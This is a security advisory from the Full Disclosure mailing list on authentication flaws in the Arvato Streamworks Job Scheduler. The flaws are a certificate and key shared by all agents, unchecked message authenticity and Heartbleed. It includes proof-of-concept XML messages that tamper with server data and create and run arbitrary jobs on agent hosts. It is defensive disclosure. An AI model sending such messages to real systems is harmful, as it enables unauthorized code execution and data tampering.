secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler

[Simon Bieber <sbieber () secuvera de>]

Affected Products
   Streamworks Job Scheduler Release 7 (older/newer releases have not  
been tested)

References
   Secuvera-SA-2016-01  
https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for  
updates)
   No CVE number could be assigned (vendor not listed under  
cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
   Arvato Systems Streamworks Job Scheduler is a software product for  
automation purposes. It helps
   "to plan, maintain, control and monitor all of your automatable IT  
processes" (source: vendor product
   homepage). It consists of different types of services: an  
application server daemon, a processing
   server daemon that controls one or multiple agent daemins  
installed on operating servers were workload
   has to be done.

   During a penetration test at a customers site three weaknesses  
concerning communication
   authentication were discovered:

   1) All agents installed on server systems use the same X.509  
certificates and private key that
          were issued by the vendor for authentication.

   2) The processing server component does not check received  
messages properly for authenticity.

   3) Agents installed on servers do not check received messages  
properly for authenticity

   4) Agents and processing servers are vulnerable against TLS  
Heartbleed attack (CVE-2014-0160 -
      see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160)

Effect:
   1) If systems were compromised and authentication material is  
stolen, all certificates have to be
      revoked and replaced. In addition, this expands the effect of   
3) to the entire environment,
          not just single systems.

   2) An attacker with knwolegde of the message syntax of the product  
and the authentication material
      is able to add, change or delete data within the Streamworks database.

   3) An attacker with knowledge of the message syntax of the product  
and the authentication material
      is able to create new or execute available jobs on servers with  
agents installed located within
	  the same network. This can lead to a complete loss of integrity,  
confidentiality or availability
          of the respective system or data stored/processed on it.

   4) An unauthenticated remote attacker is able to read content  
within system memory.

Vulnerable components and scripts:
   Streamworks Job Scheduler Processing Server Release 7.1
   Streamworks Job Scheduler Agent Release 7.1
   older releases have not been tested

Examples:
   In the following, a sample to exploit 2) and 3) will be given.  
Replace Information within squared
   brackets:

   2) By sending a the following XML-Message to a Processing server  
it is possible to change system
   information of a legitimate configured client as proof-of-concept.  
The System OS Info was slightly
   changed:

   <AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
        <ComHeader Version="1.0">
                <MandatorCode>0100</MandatorCode>
                <MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
                <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
		<SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of  
legitimate Client]" />
		<DestinationEndpoint Address="[FQDN of Processing server]"  
Port="9600" SysId="[FQDN of Proces
                sing server]" />
                <Sequence>0</Sequence>
        </ComHeader>
        <SystemInformation>
                <OsType>Windows</OsType>
                <OsInfo>Pentest Windows!</OsInfo>
                <OsLocale>de_DE.windows-1252</OsLocale>
        </SystemInformation>
        <KnownJobsList>
        </KnownJobsList>
        <FileTransferOptions Mode="ALL" BlockSize="0" />
        <Cli CliOptions="Enabled" />
   </AgentNotifyStarted>


 -------------


   3) By sending a XML-Message of the following type to create and  
execute a new job on a system
   <ServerRequestStartJob>
    <ComHeader Version="0.1">
     <MandatorCode>0100</MandatorCode>
     <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
     <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
     <SourceEndpoint Address="[FQDN of processing server]"  
Port="9600" SysId="[FQDN of processing
         server]" />
     <DestinationEndpoint Address="[IP of Server with agent  
installed]" Port="30000" SysId="[Hostname of
         server with agent installed]" />
     <Sequence>1</Sequence>
     <MandatorId>0100</MandatorId>
    </ComHeader>
    <JobStartInfo>
      <JobInfo ServerJobId="118291965_1" ExecutionNo="1"  
PlanDate="[YYYY]-[MM]-[DD]"
          StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
      <UserName>[Username under which the agent should run the  
Script, e.g. LOCAL\System]</UserName>
      <Password>[Add Password of the user if needed]</Password>
      <UseUserProfile>true</UseUserProfile>
      <MainScript>[base64-encoded Script code, e.g.  
"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl"
          to start a notepad.exe on a Windows Host]</MainScript>
      <KeepJoblogDays>10</KeepJoblogDays>
    </JobStartInfo>
   </ServerRequestStartJob>

Solution:
   Install Streamworks Release 9.3
    
(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available  
in
        german only)

Disclosure Timeline:
   2016/05/12 vulnerabilities discovered
   2016/05/30 vendor initially contacted
   2016/06/13 sales representative replied
   2016/06/14 technically responsible contact details received
   2016/07/01 technical personnel contacted, appointment to discuss  
findings made
   2016/07/11 submitted technical details to responsible personnel
   2016/07/12 responsible product manager replied. Committed to  
extend disclosure timeline due to
              comprehensible reasons. New disclosure timeline: end of  
September 2016
   2016/09/08 product manager replied, suggest meeting to discuss fixes
   2016/09/27 meeting took place, half of the vulnerabilities were  
fixed. Timeline until disclosure extended
              again due to difficult changes. Disclosure timeline  
extended to end of April 2017
   2017/04/20 Contacted vendor again to remind of the near end of the  
disclosure timeline.
   2017/04/27 Reply and ongoing discussion about when the fix will be shipped.
   2017/05/20 Vendor replied that due to customers experience fewer  
releases were made. The fix will be shipped
              on the second quarter of 2018. Extended disclosure  
timeline until the end of June 2018.
   2018/04/03 Contacted vendor as reminder and to get a release ship date.
   2018/04/09 Vendor replied saying that within release 9.3 (shipped  
on 2nd quarter 2018) the issues will be fixed
              Final disclosure timeline: 2019/01/14 after a  
sufficient grace period to customers to install the fixed
              release
   2019/01/14 public advisory disclosure


Credits
        Simon Bieber, secuvera GmbH
        sbieber () secuvera de
        https://www.secuvera.de

Disclaimer:
    All information is provided without warranty. The intent is to  
provide informa-
    tion to secure infrastructure and/or systems, not to be able to  
attack or damage.
    therefore secuvera shall not be liable for any direct or indirect  
damages that
    might be caused by using this information.




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/